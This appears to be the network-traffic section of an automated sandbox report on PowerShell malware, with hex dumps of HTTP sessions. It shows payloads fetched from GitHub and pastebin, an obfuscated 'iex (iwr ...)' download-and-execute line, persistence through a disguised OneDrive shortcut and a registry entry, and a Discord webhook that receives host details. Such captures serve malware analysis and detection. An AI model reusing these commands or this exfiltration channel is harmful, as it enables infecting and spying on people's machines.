                                                                                                                        2024-10-15 13:52:16 UTC1378INData Raw: fd 2e 14 48 4e 91 85 d6 25 b1 8b 6c ff ae a7 19 bf 8f 24 f3 7c 6f 87 56 ef 14 22 67 64 d9 c1 69 3d 66 4c bb 88 30 68 60 61 d9 c5 97 d4 0f cd f2 81 05 32 75 00 0d ae 83 4c b4 71 33 6a 26 b3 ff 00 6e 17 c3 f9 e6 5c f5 55 a1 3a 79 e6 8f 27 98 61 31 ef 53 62 7d a1 3c b7 8b f5 d3 f2 c4 2a d9 f1 31 30 62 08 94 1c 69 db 21 91 51 68 8d 0f 45 32 91 aa bc 8d 2b 22 1c 4b fd 81 ab ef c4 bc 69 5b d2 8f c2 56 08 e2 ad 96 db 16 dd ab a1 99 1f c5 01 fb 67 f7 06 f5 67 2a 50 f1 0a 08 19 69 ac a3 b0 36 9e ff 7b e1 23 9e b9 52 a2 d4 66 95 9b 9d e3 3d a4 ce 9b f6 3f 31 8e 04 87 b3 78 bf e3 06 ac 87 2b d8 93 17 d4 86 dd 0e 4d 7e a3 c3 fe 8e 55 c5 48 74 0e c0 ef 64 40 06 e3 42 e4 ab 55 3d 90 08 5e 05 ca ae 2b 7f d2 75 67 62 a7 ee 07 5c ab be 6e c8 4e be 18 8e a0 05 b0 26 22 ab
                                                                                                                        Data Ascii: .HN%l$|oV"gdi=fL0h`a2uLq3j&n\U:y'a1Sb}<*10bi!QhE2+"Ki[Vgg*Pi6{#Rf=?1x+M~UHtd@BU=^+ugb\nN&"
                                                                                                                        2024-10-15 13:52:16 UTC1378INData Raw: 7a ee 7b ce 51 f5 c0 f7 20 80 38 29 33 ea 43 4e d2 2c 47 f9 4c d8 bb 7d 76 2d 47 27 ac e1 b5 fb df 59 5d cd b2 6a c1 fd 17 d0 0e b2 81 95 18 a0 76 dd de c4 7e 5c e7 49 db 31 02 a7 3d 0c ca 91 0e b2 78 da 4c fc 0d 0f 6d b2 4b 83 57 b1 8b 4e 03 bd bb 44 67 06 b4 82 09 79 5b f5 ab 76 51 fc 45 3c 56 14 cc a7 14 97 fb ea 2d 95 ab 9b eb d6 92 a3 37 02 7f c7 71 2f e5 ea ee f2 49 87 63 41 93 51 9e ca e1 6d b6 c4 a9 f8 e1 70 7d 31 ac 3c cc 61 a2 9a 66 29 ce f5 9e 38 7d 0b 2f e5 48 be ce 96 a7 e3 51 9a 42 4b db 79 e5 d1 f7 98 15 99 7b 47 31 92 0b 24 ea 77 d7 0a cd 05 f8 03 37 71 38 c2 d0 65 81 1d 11 49 81 25 6c 53 99 5a f7 77 bc 7e 5a f1 e6 e6 ac 13 65 c9 01 cf b8 71 c3 85 3d 35 ab ab 0c e0 b6 3f e1 51 1f b8 67 66 8e 7c bc b3 cc 6f 4d 7d 78 4a 71 f4 06 7f 36 54 45
                                                                                                                        Data Ascii: z{Q 8)3CN,GL}v-G'Y]jv~\I1=xLmKWNDgy[vQE<V-7q/IcAQmp}1<af)8}/HQBKy{G1$w7q8eI%lSZw~Zeq=5?Qgf|oM}xJq6TE
                                                                                                                        2024-10-15 13:52:16 UTC1378INData Raw: 3f b7 f1 1b b6 fc ea 5c 6f 96 b3 25 68 2f a7 c1 81 2b 29 52 2c e3 de b2 bb 1a 6e a8 3f c6 e0 09 6a 99 eb b7 74 b8 86 fc 00 e2 b2 31 09 d6 45 4a d5 72 40 5f 88 92 f5 8f b7 ed 65 a0 b8 a6 34 cf cc 94 71 89 87 a2 cf f2 f5 97 18 e8 cf 7f 7c ee 46 d0 50 54 49 1f 33 d7 5b 70 4d 67 2c 1e 64 65 fc 54 6f 93 2d 16 3a 5d f5 7c 23 4c 6d 6e 34 b7 b0 6c 84 60 8e b2 80 f7 e5 fc a7 2a 36 de 11 01 97 81 86 4d 92 80 90 7e 8f de e6 b0 c7 57 21 17 4f e8 ea 9f 18 45 d6 37 25 43 f0 8d 4e 34 31 d4 e2 57 e4 4a e8 01 e0 08 9b dd 3f 59 c3 60 a1 53 d2 6e f4 9a 62 cb df 7a 01 53 c6 20 b5 30 65 8d 7a 84 25 63 ed 40 9a bd 68 53 3c 70 8a 16 73 5e 2f 0c f5 b7 e6 c4 34 d5 23 b3 c7 27 54 6e c9 71 93 88 ff 03 98 c4 c1 1e b5 97 2b c5 b8 fc 4b 45 06 d2 51 a8 fa 50 4f c7 b9 8c 23 5f 69 f1 82
                                                                                                                        Data Ascii: ?\o%h/+)R,n?jt1EJr@_e4q|FPTI3[pMg,deTo-:]|#Lmn4l`*6M~W!OE7%CN41WJ?Y`SnbzS 0ez%c@hS<ps^/4#'Tnq+KEQPO#_i


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        2192.168.2.649797185.199.109.1334434372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-10-15 13:52:36 UTC223OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-10-15 13:52:36 UTC901INHTTP/1.1 200 OK
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 7084
                                                                                                                        Cache-Control: max-age=300
                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                        ETag: "19c34b01bc0de3420610e902b58491f6f98d61c6733fbdc38504b32046860435"
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-Frame-Options: deny
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        X-GitHub-Request-Id: 9790:3FFFA2:8979E5:95DF38:670E73A3
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Date: Tue, 15 Oct 2024 13:52:36 GMT
                                                                                                                        Via: 1.1 varnish
                                                                                                                        X-Served-By: cache-dfw-kdfw8210026-DFW
                                                                                                                        X-Cache: MISS
                                                                                                                        X-Cache-Hits: 0
                                                                                                                        X-Timer: S1729000356.266957,VS0,VE104
                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                        X-Fastly-Request-ID: a6b90c0ebbf1e3bcc45ada7ed25a87c8cc5eae69
                                                                                                                        Expires: Tue, 15 Oct 2024 13:57:36 GMT
                                                                                                                        Source-Age: 0
                                                                                                                        2024-10-15 13:52:36 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 0a 23 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 24 65 6e 76 3a 74 6d 70 5c 44 72 69 76 65 72 44 69 61 67 2e 64 6c 6c 22 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 0a 24 63 75 72 72 65 6e 74 50 61 74 68 20 3d 20 5b 53 79 73 74 65 6d 2e 45 6e 76 69 72 6f 6e 6d 65 6e 74 5d 3a 3a 47 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 28 22 50 41 54 48 22 2c 20 22 55 73 65 72 22 29 0a 24 6e 65 77 50 61 74 68 20 3d 20 24 63
                                                                                                                        Data Ascii: sleep 5#$googoogaagaa = "$env:tmp\DriverDiag.dll"$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $c
                                                                                                                        2024-10-15 13:52:36 UTC1378INData Raw: 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 34 34 2c 34 32 2c 34 31 2c 38 39 2c 38 2c 31 38 36 2c 34 36 2c 30 2c 30 2c 30 2c 32 34 36 2c 32 35 2c 30 2c 30 2c 30 2c 30 2c 32 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 32 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 34 36 2c 32 33 38 2c 32 38 2c 31 2c 38 37 2c 30 2c 31 30 35 2c 30 2c 31 31 30 2c 30 2c 31 30 30 2c 30 2c 31 31 31 2c 30 2c 31 31 39 2c 30 2c 31 31 35 2c 30 2c 30 2c 30 2c 32 32 2c 30 2c 39 30 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 33 36 2c 38 39 2c 31 30 34 2c 31 38 33 2c 31 36 2c 30 2c 38 33 2c 31 32 31 2c 31 31 35 2c 31 31 36 2c 31 30 31 2c 31 30 39 2c 35 31 2c 35 30 2c 30 2c 30 2c 36 36 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34
                                                                                                                        Data Ascii: 0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84
                                                                                                                        2024-10-15 13:52:36 UTC1378INData Raw: 34 37 2c 30 2c 39 39 2c 30 2c 33 32 2c 30 2c 33 34 2c 30 2c 31 31 32 2c 30 2c 31 31 31 2c 30 2c 31 31 39 2c 30 2c 31 30 31 2c 30 2c 31 31 34 2c 30 2c 31 31 35 2c 30 2c 31 30 34 2c 30 2c 31 30 31 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 33 32 2c 30 2c 34 35 2c 30 2c 39 39 2c 30 2c 31 31 31 2c 30 2c 31 30 39 2c 30 2c 31 30 39 2c 30 2c 39 37 2c 30 2c 31 31 30 2c 30 2c 31 30 30 2c 30 2c 33 32 2c 30 2c 31 31 32 2c 30 2c 31 31 31 2c 30 2c 31 31 39 2c 30 2c 31 30 31 2c 30 2c 31 31 34 2c 30 2c 31 31 35 2c 30 2c 31 30 34 2c 30 2c 31 30 31 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 34 35 2c 30 2c 31 31 39 2c 30 2c 31 30 35 2c 30 2c 31 31 30 2c 30 2c 31 30 30 2c 30 2c 31 31 31
                                                                                                                        Data Ascii: 47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111
                                                                                                                        2024-10-15 13:52:36 UTC1378INData Raw: 31 30 2c 32 33 39 2c 31 37 2c 31 35 30 2c 31 39 34 2c 32 31 32 2c 32 31 36 2c 38 33 2c 31 33 33 2c 32 34 2c 31 37 2c 37 33 2c 32 2c 30 2c 30 2c 39 2c 30 2c 30 2c 31 36 30 2c 38 39 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 32 33 37 2c 34 38 2c 31 38 39 2c 32 31 38 2c 36 37 2c 30 2c 31 33 37 2c 37 31 2c 31 36 37 2c 32 34 38 2c 32 30 38 2c 31 39 2c 31 36 34 2c 31 31 35 2c 31 30 32 2c 33 34 2c 36 31 2c 30 2c 30 2c 30 2c 31 30 30 2c 30 2c 30 2c 30 2c 30 2c 33 31 2c 30 2c 30 2c 30 2c 32 32 2c 30 2c 30 2c 30 2c 38 33 2c 30 2c 31 32 31 2c 30 2c 31 31 35 2c 30 2c 31 31 36 2c 30 2c 31 30 31 2c 30 2c 31 30 39 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 33 32 2c 30 2c 34 30 2c 30 2c 36 37 2c 30 2c 35 38 2c 30 2c 39 32 2c 30 2c 38 37 2c 30 2c 31 30 35 2c 30
                                                                                                                        Data Ascii: 10,239,17,150,194,212,216,83,133,24,17,73,2,0,0,9,0,0,160,89,0,0,0,49,83,80,83,237,48,189,218,67,0,137,71,167,248,208,19,164,115,102,34,61,0,0,0,100,0,0,0,0,31,0,0,0,22,0,0,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,40,0,67,0,58,0,92,0,87,0,105,0
                                                                                                                        2024-10-15 13:52:36 UTC1378INData Raw: 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 35 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 31 37 37 2c 32 32 2c 31 30 39 2c 36 38 2c 31 37 33 2c 31 34 31 2c 31 31 32 2c 37 32 2c 31 36 37 2c 37 32 2c 36 34 2c 34 36 2c 31 36 34 2c 36 31 2c 31 32 30 2c 31 34 30 2c 32 39 2c 30 2c 30 2c 30 2c 31 30 34 2c 30 2c 30 2c 30 2c 30 2c 37 32 2c 30 2c 30 2c 30 2c 31 32 37 2c 31 30 35 2c 31 39 34 2c 32 32 34 2c 32 31 37 2c 38 38 2c 32 34 38 2c 37 35 2c 31 33 38 2c 32 35 32 2c 32 36 2c 36 30 2c 36 36 2c 34 39 2c 34 2c 37 32 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 29 0a 24 72 65 63 6f 6e 73 74 72 75
                                                                                                                        Data Ascii: 108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,0,0,0,0,0,0,57,0,0,0,49,83,80,83,177,22,109,68,173,141,112,72,167,72,64,46,164,61,120,140,29,0,0,0,104,0,0,0,0,72,0,0,0,127,105,194,224,217,88,248,75,138,252,26,60,66,49,4,72,0,0,0,0,0,0,0,0,0,0,0,0)$reconstru
                                                                                                                        2024-10-15 13:52:36 UTC194INData Raw: 20 22 46 61 69 6c 65 64 20 74 6f 20 73 65 6e 64 20 6d 65 73 73 61 67 65 2e 20 45 72 72 6f 72 3a 20 24 5f 22 0a 7d 0a 23 73 74 61 72 74 20 70 6f 77 65 72 73 68 65 6c 6c 20 2d 77 69 6e 64 6f 77 73 74 79 6c 65 20 68 20 2d 61 72 67 73 20 27 69 65 78 20 28 69 77 72 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 4e 65 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 5f 70 79 6c 64 2e 74 78 74 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 27 0a 0a 7d 0a
                                                                                                                        Data Ascii: "Failed to send message. Error: $_"}#start powershell -windowstyle h -args 'iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing)'}


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        3192.168.2.649898162.159.138.2324434372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-10-15 13:52:55 UTC311OUTPOST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                        Content-Type: application/json
                                                                                                                        Host: discord.com
                                                                                                                        Content-Length: 216
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-10-15 13:52:55 UTC216OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 2a 2a 65 6e 67 69 6e 65 65 72 2a 2a 20 68 61 73 20 6a 6f 69 6e 65 64 20 2d 20 73 74 6d 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 4c 33 38 58 50 53 46 5a 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 22 0d 0a 7d
                                                                                                                        Data Ascii: { "content": "**user** has joined - stm\n----------------------------------\n**GPU:** L38XPSFZ\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4"}
                                                                                                                        2024-10-15 13:52:55 UTC1354INHTTP/1.1 204 No Content
                                                                                                                        Date: Tue, 15 Oct 2024 13:52:55 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        set-cookie: __dcfduid=c76c07ce8afc11efb35a8ee061dd2aca; Expires=Sun, 14-Oct-2029 13:52:55 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                        x-ratelimit-limit: 5
                                                                                                                        x-ratelimit-remaining: 4
                                                                                                                        x-ratelimit-reset: 1729000376
                                                                                                                        x-ratelimit-reset-after: 1
                                                                                                                        via: 1.1 google
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=drFodlYM8GIn2yzM7wQgGiq4SsT04OF9gHv3FeS5Jei02frL1lReboANpQBI9CdIfpWxB%2BNfxIBo3BaPhZ0AnQIU5%2B6sESkQPoskKl11niMeeDRuowWqqw4pq%2Fc3"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                        Set-Cookie: __sdcfduid=c76c07ce8afc11efb35a8ee061dd2aca42fe908a74206032a1d9b4ca47ffd428460ccae185b0d35fd48f05a6a78e1971; Expires=Sun, 14-Oct-2029 13:52:55 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                        Set-Cookie: __cfruid=8e8f5f93f4ed222c58b1aae65fe99ba14cc762fb-1729000375; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                        2024-10-15 13:52:55 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 4b 43 59 76 75 72 51 6b 43 31 54 79 78 42 45 6d 4a 6d 34 63 4b 48 69 39 37 78 42 34 37 4b 42 30 54 61 43 77 42 71 44 77 36 76 67 2d 31 37 32 39 30 30 30 33 37 35 34 33 34 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 30 34 61 64 39 31 64 62 37 34 36 36 62 2d 44 46 57 0d 0a 0d 0a
                                                                                                                        Data Ascii: Set-Cookie: _cfuvid=KCYvurQkC1TyxBEmJm4cKHi97xB47KB0TaCwBqDw6vg-1729000375434-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304ad91db7466b-DFW


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        4192.168.2.649900172.67.19.24443420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-10-15 13:52:55 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                        Host: pastebin.com
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-10-15 13:52:55 UTC396INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 15 Oct 2024 13:52:55 GMT
                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        x-frame-options: DENY
                                                                                                                        x-content-type-options: nosniff
                                                                                                                        x-xss-protection: 1;mode=block
                                                                                                                        cache-control: public, max-age=1801
                                                                                                                        CF-Cache-Status: HIT
                                                                                                                        Age: 25
                                                                                                                        Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8d304adbcc966c62-DFW
                                                                                                                        2024-10-15 13:52:55 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                                                                        Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                                                                        2024-10-15 13:52:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        5192.168.2.649911185.199.109.133443420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-10-15 13:52:57 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-10-15 13:52:57 UTC901INHTTP/1.1 200 OK
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 7508
                                                                                                                        Cache-Control: max-age=300
                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                        ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-Frame-Options: deny
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Date: Tue, 15 Oct 2024 13:52:57 GMT
                                                                                                                        Via: 1.1 varnish
                                                                                                                        X-Served-By: cache-dfw-kdfw8210158-DFW
                                                                                                                        X-Cache: HIT
                                                                                                                        X-Cache-Hits: 1
                                                                                                                        X-Timer: S1729000377.144876,VS0,VE1
                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                        X-Fastly-Request-ID: ee338deaaa50f889bc8818e31f2264a8a069c2f1
                                                                                                                        Expires: Tue, 15 Oct 2024 13:57:57 GMT
                                                                                                                        Source-Age: 24
                                                                                                                        2024-10-15 13:52:57 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                                                                        Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                                                                        2024-10-15 13:52:57 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                                                                        Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
